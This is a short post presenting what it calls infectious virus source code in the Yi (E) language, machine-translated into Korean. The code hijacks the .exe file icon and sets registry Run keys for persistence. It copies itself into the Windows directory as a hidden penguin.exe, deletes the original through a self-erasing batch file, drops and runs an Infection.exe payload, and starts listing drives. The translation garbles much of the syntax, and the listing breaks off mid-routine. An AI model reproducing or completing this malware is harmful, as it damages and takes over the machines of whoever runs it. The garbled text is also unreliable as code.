Guiqiu: Yi 언어로 작성된 감염성 바이러스 소스 코드..

.버전 2

.지원 라이브러리 eAPI

리소스 파일 아이콘 추출(실행 디렉터리 가져오기() + "\" + 실행 파일 이름 가져오기) (), 0, "C:\windows\system32\Aver.ico", ) '시스템 exe 아이콘 교체

등록 항목 쓰기(#local machine, "SOFTWARE\Classes\exefile\DefaultIcon\ ", "C: \windows\system32\Aver.ico”) ' 레지스트리 키에 쓰기

레지스트리 항목 쓰기(#현재 사용자, “Software\Microsoft\Windows\CurrentVersion\Run\” + 실행 파일명 가져오기( ), 실행 디렉터리 가져오기() + "\" + 실행 파일 이름 가져오기()) ' 트로이 목마를 복원하고 삭제 후 자동으로 시작할 수 있도록 레지스트리 키 값을 씁니다.

.true인 경우(실행 디렉터리 가져오기() ≠ 환경 변수 읽기("Windir"))

파일 복사(실행 디렉터리 가져오기() + "\" + 실행 파일 이름 가져오기) (), 환경 변수 읽기 ("Windir") + "\penguin.exe")

실행 ("Cmd /c Attrib H S" + 환경 변수 읽기 ("Windir") + "\penguin.exe" exe", true, 1)

실행(환경 변수 읽기("Windir") + "\penguin.exe", false, )

파일에 쓰기(환경 변수 읽기( "Windir") + "penguin.bat", 바이트 세트로 (" @echo off" + #Newline 문자 + "Taskkill /f /im" + 실행 파일 이름 가져오기 () + #Newline 문자 + "Del" + 가져오기 현재 디렉터리 () + “\” + 실행 파일 이름 가져오기 () + # 줄 바꿈 문자 + "Del 0" + # 줄 바꿈 문자 + "Exit"))

파일에 쓰기(환경 변수 읽기) ("Windir") + "\penguin.bat", 바이트 세트로(하위 텍스트 대체(하위 텍스트 대체(텍스트로(파일 읽기(환경 변수 읽기("Windir") + "penguin.bat"))), "C: \Documents and Settings", "C:\DOCUME~1", , , false), "Windows", " ", , , false)))

실행(환경 변수 읽기("Windir") + "\penguin.bat", true, 1)

. true이면 종료

. true이면 실행 디렉터리 가져오기() = 환경 변수 읽기("Windir"))

등록 항목 쓰기(#로컬 머신, "SOFTWARE \Microsoft\Windows\CurrentVersion\Run\penguin", 환경 변수 읽기("Windir") + "\penguin.exe")

파일에 쓰기(환경 변수 읽기("Windir") + "Infection .exe", #infection)

실행(환경 변수 읽기("Windir") + "\Infection.exe", true , 1)

. true인 경우

Drive = 드라이브 목록 가져오기()